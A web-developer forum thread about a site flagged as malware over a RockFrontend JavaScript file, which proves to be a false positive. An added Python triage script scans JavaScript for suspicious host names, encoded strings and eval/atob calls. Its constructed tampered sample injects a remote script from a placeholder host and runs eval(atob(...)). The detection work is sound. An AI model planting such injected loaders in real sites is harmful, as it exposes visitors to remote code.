heldercervantes, posted July 3

@bernhard you might want to have a look at this. One of my sites is displaying the red screen of extermination, saying that the site is dangerous and contains malware. Google itself wasn't much help, with Search Console just giving me a vague answer, but using other tools it comes down to Rockfrontend's JS:

Has anyone had this issue? Any ideas?

Edit: I was on Rockfrontend version 3.2.2. After updating to the current version, Sucuri's SiteCheck doesn't seem to complain about RF anymore and only says the site is blacklisted by GSF. I've requested a new review from Google and I'm awaiting a response.

ryan, posted July 3

@heldercervantes did you swap in a fresh copy of that file, or is that the same one that's been there a while? I grabbed that file mentioned from the site (RockFrontend.min.js) and un-minified it, and I'm guessing it's a false positive because I don't see any obvious monkey business in it. No references to other scripts or host names, no encoded strings, no obfuscated code, nothing that looks malware-ish to me. It is doing some iframe stuff, swapping of iframe src attributes and such, and it could be that this is something that some malware does, but I think it's most likely legit here as it's using the same naming conventions in attributes as the rest of the code (i.e. starting with "rf.." for rock front-end). Anyone have any ideas why it detected it as malware? Even if I try to access the file in my browser, it gets blocked (since it's blacklisted), so I had to use wget to grab the file.

Edit: I see you edited your message and that it's not the original file that got flagged. It'd be interesting to see what was in the older version. If it had malware in it, you'd want to check where it came from... like did it get modified by something after getting to your server, and if in a shared environment, are the file permissions too open?
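
Added example, not part of ryan's post and not RockFrontend code: the manual checks described above (host names, encoded strings, dynamic code, whether the deployed file differs from a fresh copy, and overly open file permissions) written as a small Python triage script. The sample strings, the `rf-src` attribute name and the function names are constructed for illustration.

```python
import hashlib, os, re, stat

# Heuristics only: a hit means "read this part by hand", not "this is malware".
URL_HOST = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)
ENCODED = re.compile(r"""["']([A-Za-z0-9+/=]{80,}|(?:\\x[0-9a-f]{2}){20,})["']""", re.I)
DYNAMIC = re.compile(r"\b(?:eval|atob|unescape|fromCharCode)\s*\(|new\s+Function\s*\(|document\.write\s*\(")

def triage_js(source, allowed_hosts=()):
    """Report host names, long encoded string literals and dynamic-code calls."""
    hosts = {h.lower() for h in URL_HOST.findall(source)} - set(allowed_hosts)
    calls = {m.group(0).rstrip("( \t") for m in DYNAMIC.finditer(source)}
    return {"hosts": sorted(hosts),
            "encoded_strings": len(ENCODED.findall(source)),
            "dynamic_code": sorted(calls)}

def integrity_check(path, reference_sha256):
    """Compare a deployed file with a fresh copy's SHA-256 and check write bits."""
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()
    mode = os.stat(path).st_mode
    return {"modified": digest != reference_sha256,
            "group_or_world_writable": bool(mode & (stat.S_IWGRP | stat.S_IWOTH))}

# Constructed samples, not RockFrontend's code; "rf-src" is a made-up attribute name.
CLEAN = ('document.querySelectorAll("iframe[rf-src]").forEach('
         'function(e){e.src=e.getAttribute("rf-src")});')
TAMPERED = (CLEAN + 'var s=document.createElement("script");'
            's.src="https://cdn.example.invalid/x.js";document.head.appendChild(s);'
            'eval(atob("' + "QUJD" * 25 + '"));')

if __name__ == "__main__":
    import tempfile
    fd, path = tempfile.mkstemp(suffix=".min.js")
    with os.fdopen(fd, "w") as fh:
        fh.write(TAMPERED)
    os.chmod(path, 0o666)
    reference = hashlib.sha256(CLEAN.encode()).hexdigest()
    print(triage_js(CLEAN))
    print(triage_js(TAMPERED))
    print(integrity_check(path, reference))
    os.remove(path)
```

The reference hash should come from a copy of the same module version fetched from a trusted source, and hosts the site legitimately loads from can be passed in `allowed_hosts`.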

Jonathan Lahijani, posted July 3

Is this related to the recent polyfill.js supply-chain attack?

https://news.ycombinator.com/item?id=40791829
https://sansec.io/research/polyfill-supply-chain-attack

heldercervantes (author), posted July 5

Thanks for your replies. It was most likely a false positive. After updating and requesting a new review, the site was cleared.

@ryan I don't think the file was modified. That would be too weirdly specific and discreet for a hack. It was probably something harmless in the code that was raising suspicion.

Sucks that without any fault a site that's running campaigns and paying to grab traffic would get such an alarming message from Google. Hard hit on the brand.

On a side note: First time ever that I had to update something on a published project. I have sites published almost 10 years ago that had zero issues of this sort.